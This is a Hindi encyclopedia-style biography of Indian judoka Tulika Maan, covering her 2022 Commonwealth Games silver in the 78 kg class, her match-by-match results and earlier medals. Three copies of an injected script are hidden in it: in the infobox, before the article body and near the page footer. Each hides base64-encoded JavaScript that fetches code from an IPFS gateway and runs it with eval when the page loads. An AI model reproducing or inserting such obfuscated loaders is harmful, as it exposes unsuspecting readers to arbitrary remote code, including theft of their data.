तूलिका मान

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
तूलिका मान
तूलिका मान
पूरा नाम तूलिका मान
जन्म 9 सितम्बर, 1998
जन्म भूमि दिल्ली, भारत
अभिभावक पिता- सतबीर मान (स्वर्गवास)

माता- अमृता

कर्म भूमि भारत
खेल-क्षेत्र जूडो
प्रसिद्धि भारतीय महिला जूडोका
नागरिकता भारतीय
कॉमनवेल्थ गेम्स बर्मिंघम, 2022 - 78 कि.ग्रा. भार वर्ग - रजत
साउथ ऐशियन गेम्स काठमाण्डू, 2019 - 78 कि.ग्रा. भार वर्ग - स्वर्ण
अन्य जानकारी साल 2017 में तूलिका मान ने बुडापेस्ट में पहली बार विश्व चैंपियनशिप में भाग लिया था और टोक्यो में दुनिया की शीर्ष जूडो खिलाड़ियों का सामना किया था।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>तूलिका मान (अंग्रेज़ी: Tulika Maan, जन्म- 9 सितम्बर, 1998) भारत की जूडो खिलाड़ी हैं। उन्होंने बर्मिंघम, इंग्लैंड में आयोजित कॉमनवेल्थ गेम्स, 2022 में जुडो के 78 कि.ग्रा. भारवर्ग में सिल्वर मेडल जीतकर देश का नाम रोशन किया है। वह इसके पहले भी जुडो में अंतरराष्ट्रीय पदक जीत चुकी हैं। तूलिका मान ने सेमीफाइनल में न्यूजीलैंड की सिडनी एंड्रयूज को हराया था और फाइनल में अपनी जगह पक्की की थी, लेकिन जिस दांव इपोन की वजह से वह सिडनी एंड्रयूज को हराकर फाइनल में पहुंची थी; फाइनल में यही दांव इन पर इनके प्रतिद्वंद्वी ने लगा दिया और एक अंक से आगे निकलने के बावजूद तूलिका को हार का सामना करना पड़ा और उन्हें सिल्वर मेडल मिला लेकिन तूलिका मान कि ये उपलब्धि भी बेहद खास है।

कॉमनवेल्थ गेम्स, 2022 में सफर

  • कॉमनवेल्थ गेम्स, 2022 में तूलिका मान का पहला मुकाबला मॉरिशस की ट्रैसी डुरहोन के खिलाफ था। 78 किलोग्राम या उससे ज्यादा भारवर्ग में तूलिका ने शानदार प्रदर्शन किया। उन्होंने इपॉन के जरिए एक अंक हासिल किया और यही निर्णायक साबित हुआ। हालांकि, मारिशस की खिलाड़ी ने पेनाल्टी के दो अंक भी गंवाए थे और अगर तूलिका कोई स्कोर नहीं भी करतीं तो उनकी जीत तय थी, लेकिन उन्होंने इसकी नौबत नहीं आने दी।[1]
  • तूलिका का दूसरा मैच न्यूजीलैंड के सिडनी एंड्यूस के साथ था। इस मैच में कीवी खिलाड़ी ने उन्हें कड़ी टक्कर दी और वजा-आरी के जरिए एक अंक हासिल किया, लेकिन तूलिका इपॉन के जरिए एक अंक हासिल किया और मैच जीत लिया। उन्होंने पेनाल्टी का एक अंक भी गंवाया था, लेकिन दोनों खिलाड़ियों ने स्कोर किया था। ऐसे में पेनाल्टी की अंक कोई महत्व नहीं था। तूलिका ने इस मैच में शिडो के जरिए भी अंक हासिल किया।
  • महिलाओं के 78 किलोग्राम वर्ग के फाइनल में तूलिका मान का सामना स्कॉटलैंड की सारा एडलिंग्टन के साथ था। इस मैच में उन्होंने शुरुआत में वजा-आरी से बढ़त हासिल कर ली थी, लेकिन आखिर मिनट में सारा ने इपपोन लगाकर मैच जीत लिया।

उपलब्धियाँ

तूलिका मान शुरुआत से ही जूडो की सबसे प्रतिभावान खिलाड़ियों में शामिल रही हैं। वो राष्ट्रीय स्तर पर कई प्रतियोगिताओं में स्वर्ण पदक जीत चुकी हैं।

  • जूनियर लेवल पर वो रजत पदक जीत चुकी हैं।
  • तूलिका मान 2019 से अंतरराष्ट्रीय जूडो फेडेरेशन के विश्व टूर में हिस्सा ले रही हैं।
  • उन्होंने ताइपे में एशियन ओपन में कांस्य पदक अपने नाम किया था। इससे पहले 2018 में उन्होंने जयपुर में कॉमनवेल्थ चैंपियनशिप जीती थी।
  • 2017 में तूलिका मान ने बुडापेस्ट में पहली बार विश्व चैंपियनशिप में भाग लिया था और टोक्यो में दुनिया की शीर्ष जूडो खिलाड़ियों का सामना किया था।
  • 2019 में वॉलशाल में तूलिका मान कॉमनवेल्थ चैंपियन बनी थीं।
  • जीवन कुमार शर्मा की देखरेख में आगे बढ़ने वाली तूलिका मान विश्व कप में एक कांस्य जीत चुकी हैं।
  • जूनियर स्तर पर उन्होंने दो कांस्य अपने नाम किए हैं। जूनियर लेवल पर ही उन्होंने यूरोपियन कप में एक स्वर्ण पदक और नेशनल चैंपियनशिप में एक स्वर्ण और एक रजत पदक जीत चुकी हैं।[1]
  • उन्होंने सीनियर स्तर पर राष्ट्रीय चैंपियनशिप में दो स्वर्ण पदक भी जीते हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 कौन हैं जूडो में भारत के लिए रजत जीतने वालीं तूलिका मान (हिंदी) amarujala.com। अभिगमन तिथि: 04 जुलाई, 2022।

संबंधित लेख